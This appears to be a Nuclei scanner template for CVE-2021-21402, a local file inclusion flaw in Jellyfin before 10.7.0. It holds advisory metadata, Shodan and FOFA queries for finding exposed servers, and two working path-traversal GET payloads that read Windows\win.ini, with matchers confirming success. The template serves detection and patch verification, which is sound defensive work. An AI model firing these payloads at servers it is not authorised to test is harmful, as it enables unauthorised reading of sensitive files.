id: CVE-2021-21402 info: name: Jellyfin <10.7.0 - Local File Inclusion author: dwisiswant0 severity: medium description: | Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk. impact: | Successful exploitation could allow an attacker to read sensitive files on the server. remediation: This is fixed in version 10.7.1. reference: - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx - https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1 - https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7 - https://nvd.nist.gov/vuln/detail/CVE-2021-21402 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-21402 cwe-id: CWE-22 epss-score: 0.15589 epss-percentile: 0.95782 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: jellyfin product: jellyfin shodan-query: http.html:"Jellyfin" fofa-query: title="Jellyfin" || body="http://jellyfin.media" tags: cve,cve2021,jellyfin,lfi http: - method: GET path: - "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" - "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" matchers-condition: and matchers: - type: word part: header words: - "Content-Type: application/octet-stream" - type: regex part: body regex: - "\\[(font|extension|file)s\\]" - type: status status: - 200 # digest: 4b0a00483046022100ca319ea54851d589bddc22b1cdb80765731c0eec345cacd331da11c146c1c9da022100fe36f28ff45bbab32c41eb35dc2ada46955ab00cf858c44063fafa7785dd0d83:922c64590222798bb761d5b6d8e72950